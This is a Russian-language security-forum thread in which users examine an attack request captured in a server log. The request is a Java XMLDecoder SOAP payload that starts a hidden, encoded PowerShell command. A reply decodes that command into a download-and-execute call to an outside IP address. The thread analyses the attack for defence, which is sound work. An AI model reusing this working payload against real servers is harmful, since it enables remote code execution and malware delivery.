• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Решено наблюдал интересную атаку...

Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
Код: 
soapenv:Envelope xmlns:soapenv = "http://schemas.xmlsoap.org/soap/envelope/">
\n<soapenv:Header>
\n<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
\n<java version="1.8.0_131" class="java.beans.XMLDecoder">
\n<void class="java.lang.ProcessBuilder">
\n  <array class="java.lang.String" length="3">
\n    <void index="0">
\n      <string>cmd.exe</string>
\n    </void>
\n    <void index="1">
\n      <string>/c</string>
\n    </void>
\n    <void index="2">
\n      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
\n    </void>
\n  </array>
\n    <void method="start"/>
\n</void>
\n</java>
\n</work:WorkContext>
\n</soapenv:Header>
\n<soapenv:Body/>
\n</soapenv:Envelope>
\n


вот что попало в логи, одного из серверов, атака шла от китайского IP адреса ) понятно что задействован powershell и js или java

возможно я спалил методику атаки... давайте разберемся!

кто что скажет?
 
fuzscore

fuzscore

Grey Team
21.09.2016
77
181
BIT
0
Декод строки
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL+ $OS";IEX $WC.DownloadString('
Ссылка скрыта от гостей
 
  • Нравится
Реакции: Vander и Ondrik8
Dr.Lafa

Dr.Lafa

Green Team
30.12.2016
507
1 049
BIT
0
Скорее всего бот гуляет по интернету и пытается проэксплуатировать дырку в каком-то java-приложении, которое обрабатывает xml.
Подобный эксплоит есть для Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass. CVE_2017_12617
Но тут какая-то другая уязвимость
 
  • Нравится
Реакции: Vander и Ondrik8
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ